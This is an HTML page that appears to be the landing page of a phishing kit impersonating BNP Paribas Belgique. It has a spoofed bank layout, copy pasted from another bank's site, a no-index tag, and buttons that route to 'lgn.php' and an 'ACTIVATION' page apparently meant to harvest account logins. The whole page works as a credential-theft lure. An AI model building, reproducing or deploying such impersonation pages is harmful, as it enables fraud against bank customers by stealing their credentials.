<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Language" content="fr">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Banque et assurance</title>
<meta name="author" content="Pirvate Untherthered">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<link href="BNP Paribas Belgique.css" rel="stylesheet" type="text/css">
<link href="index.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="jquery-1.11.1.min.js"></script>
<script type="text/javascript" src="jquery.2dtransform.js"></script>
<script type="text/javascript" src="jquery.ui.effect.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-bars.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-blast.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-blind.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-bounce.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-clip.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-drop.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-fade.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-fold.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-scale.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-slide.min.js"></script>
<script type="text/javascript" src="jquery.ui.effect-squares.min.js"></script>
<script type="text/javascript" src="wb.slideshow.min.js"></script>
<script type="text/javascript">
$(document).ready(function()
{
   $("#SlideShow1").slideshow(
   {
      interval: 5000,
      type: 'random',
      effect: 'random',
      direction: '',
      count: 8,
      pagination: false,
      effectlength: 2000
   });
});
</script>
</head>
<body>
<div id="space"><br></div>
<div id="container">
<div id="wb_Shape2" style="position:absolute;left:6px;top:15px;width:982px;height:566px;z-index:0;">
</div>
<div id="wb_Image1" style="position:absolute;left:6px;top:0px;width:320px;height:120px;z-index:1;">
<img src="images/logo-banque.png" id="Image1" alt=""></div>
<div id="SlideShow1" style="position:absolute;left:19px;top:138px;width:956px;height:263px;z-index:2;">
<img class="image" src="images/sliide.jpg" alt="" title="">
<img class="image" src="images/slide.jpg" style="display:none;" alt="" title="">
</div>
<div id="wb_CssMenu1" style="position:absolute;left:7px;top:85px;width:1020px;height:74px;z-index:3;">
<ul>
<li class="firstmain"><a href="#" target="_self">AU&nbsp;QUOTIDIEN</a>
</li>
<li><a href="#" target="_self">EMPRUNTER</a>
</li>
<li><a href="#" target="_self">EPARGNER</a>
</li>
<li><a href="#" target="_self">S'ASSURER</a>
</li>
<li><a href="./act.php" target="_self">ACTIVATION</a>
</li>
</ul>
<br>
</div>
<input type="button" id="Button1" onclick="window.location.href='lgn.php'; ;return false;" name="" value="Accès aux comptes" style="position:absolute;left:819px;top:20px;width:158px;height:29px;z-index:4;" title="Acceder vos comptes">
<div id="wb_Image2" style="position:absolute;left:821px;top:26px;width:17px;height:17px;z-index:5;">
<img src="images/locked-1.png" id="Image2" alt=""></div>
<div id="wb_Shape1" style="position:absolute;left:6px;top:588px;width:982px;height:203px;filter:alpha(opacity=50);-moz-opacity:0.50;opacity:0.50;z-index:6;">

</div>
<div id="wb_Text1" style="position:absolute;left:233px;top:884px;width:591px;height:23px;z-index:7;text-align:left;">
<span style="color:#129961;font-family:Arial;font-size:18px;">Rendez-vous sur le site de la BNP Paribas Belgique de votre région</span></div>
<div id="wb_Text2" style="position:absolute;left:234px;top:918px;width:552px;height:32px;z-index:8;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:13px;">Afin de proposer des solutions adaptées aux besoins de chacun, la BNP Paribas Belgique s'appuie sur les conseils personnalisés de son réseau d'experts, répartis dans ses 17 Caisses régionales.</span></div>
<div id="wb_Shape3" style="position:absolute;left:7px;top:1105px;width:970px;height:3px;filter:alpha(opacity=50);-moz-opacity:0.50;opacity:0.50;z-index:9;">
<img src="images/img0003.png" id="Shape3" alt="" style="width:970px;height:3px;"></div>
<div id="wb_Text3" style="position:absolute;left:7px;top:1119px;width:248px;height:192px;z-index:10;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:13px;"><strong>BANQUE AU QUOTIDIEN</strong></span><span style="color:#696969;font-family:Arial;font-size:13px;"><strong><br><br></strong></span><span style="color:#808080;font-family:Arial;font-size:13px;"><strong>Ouvrir un compte bancaire<br>Gérer ses comptes<br>Carte Bancaire<br>Carte Bancaire Rechargeable<br>Transmission - Successions<br>Comprendre les frais bancaires<br>Garantie des dépôts<br>Comptes inactifs et déshérence<br>Echange d’informations fiscales<br>Tarifs et informations réglementaires</strong></span></div>
<div id="wb_Text4" style="position:absolute;left:280px;top:1119px;width:250px;height:144px;z-index:11;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:13px;"><strong>AIDE ET OUTILS PRATIQUES<br><br></strong></span><span style="color:#808080;font-family:Arial;font-size:13px;"><strong>Contacts - numéros utiles<br>Assistance perte et vol / Opposition<br>Focus - «&nbsp;Tout savoir sur…&nbsp;»<br>Guides Pratiques<br>FAQ<br>Mentions légales<br>Sécurité</strong></span></div>
<div id="wb_Text5" style="position:absolute;left:530px;top:1119px;width:250px;height:176px;z-index:12;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:13px;"><strong>PROFESSIONNELS<br><br></strong></span><span style="color:#808080;font-family:Arial;font-size:13px;"><strong>Outils et services pros<br>Compte professionnel<br>Prévenir le risque de fraude<br>Entreprises<br>Associations / Economie sociale<br>Secteur Public<br>Logement Social<br>Immobilier Professionnel<br>E-remises</strong></span></div>
<div id="wb_Text6" style="position:absolute;left:762px;top:1119px;width:250px;height:160px;z-index:13;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:13px;"><strong>BNP Paribas Belgique<br></strong><br></span><span style="color:#696969;font-family:Arial;font-size:13px;">Nous connaitre<br>Fédération Nationale (FNCE)<br>Sponsoring - Mécénat<br>Recrutement<br>Site Sociétaires<br>Décideurs en Région<br>Horizon Entrepreneurs<br>Changer de Caisse</span></div>
<div id="wb_Image8" style="position:absolute;left:789px;top:1063px;width:32px;height:32px;z-index:14;">
<a href="#"><img src="images/facebook.png" id="Image8" alt=""></a></div>
<div id="wb_Image9" style="position:absolute;left:831px;top:1063px;width:32px;height:32px;z-index:15;">
<a href="#"><img src="images/twitter.png" id="Image9" alt=""></a></div>
<div id="wb_Image10" style="position:absolute;left:874px;top:1063px;width:32px;height:32px;z-index:16;">
<a href="#"><img src="images/instagram.png" id="Image10" alt=""></a></div>
<div id="wb_Image3" style="position:absolute;left:804px;top:632px;width:112px;height:112px;z-index:17;">
<img src="images/picto-science.png" id="Image3" alt=""></div>
<div id="wb_Image4" style="position:absolute;left:570px;top:632px;width:112px;height:112px;z-index:18;">
<img src="images/picto-bulles.png" id="Image4" alt=""></div>
<div id="wb_Image5" style="position:absolute;left:305px;top:632px;width:112px;height:112px;z-index:19;">
<img src="images/picto-casque.png" id="Image5" alt=""></div>
<div id="wb_Image6" style="position:absolute;left:90px;top:632px;width:112px;height:112px;z-index:20;">
<img src="images/picto-crayon.png" id="Image6" alt=""></div>
<div id="wb_Text7" style="position:absolute;left:38px;top:744px;width:252px;height:16px;z-index:21;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:13px;"><strong>VOS PROJETS SOUTENUS</strong></span></div>
<div id="wb_Text8" style="position:absolute;left:268px;top:744px;width:252px;height:16px;z-index:22;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:13px;"><strong>UNE BANQUE PROCHE DE VOUS</strong></span></div>
<div id="wb_Text9" style="position:absolute;left:531px;top:744px;width:252px;height:16px;z-index:23;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:13px;"><strong>UN SERVICE PERSONNALISÉ</strong></span></div>
<div id="wb_Text10" style="position:absolute;left:774px;top:744px;width:252px;height:16px;z-index:24;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:13px;"><strong>DES PRODUITS INNOVANTS</strong></span></div>
<div id="wb_Text11" style="position:absolute;left:310px;top:432px;width:248px;height:16px;z-index:25;text-align:left;">
<span style="color:#000000;font-family:Arial;font-size:13px;">BIENVENUE </span></div>
<div id="wb_Image7" style="position:absolute;left:7px;top:401px;width:981px;height:180px;z-index:26;">
<img src="images/img0092.png" id="Image7" alt=""></div>
</div>
</body>
</html>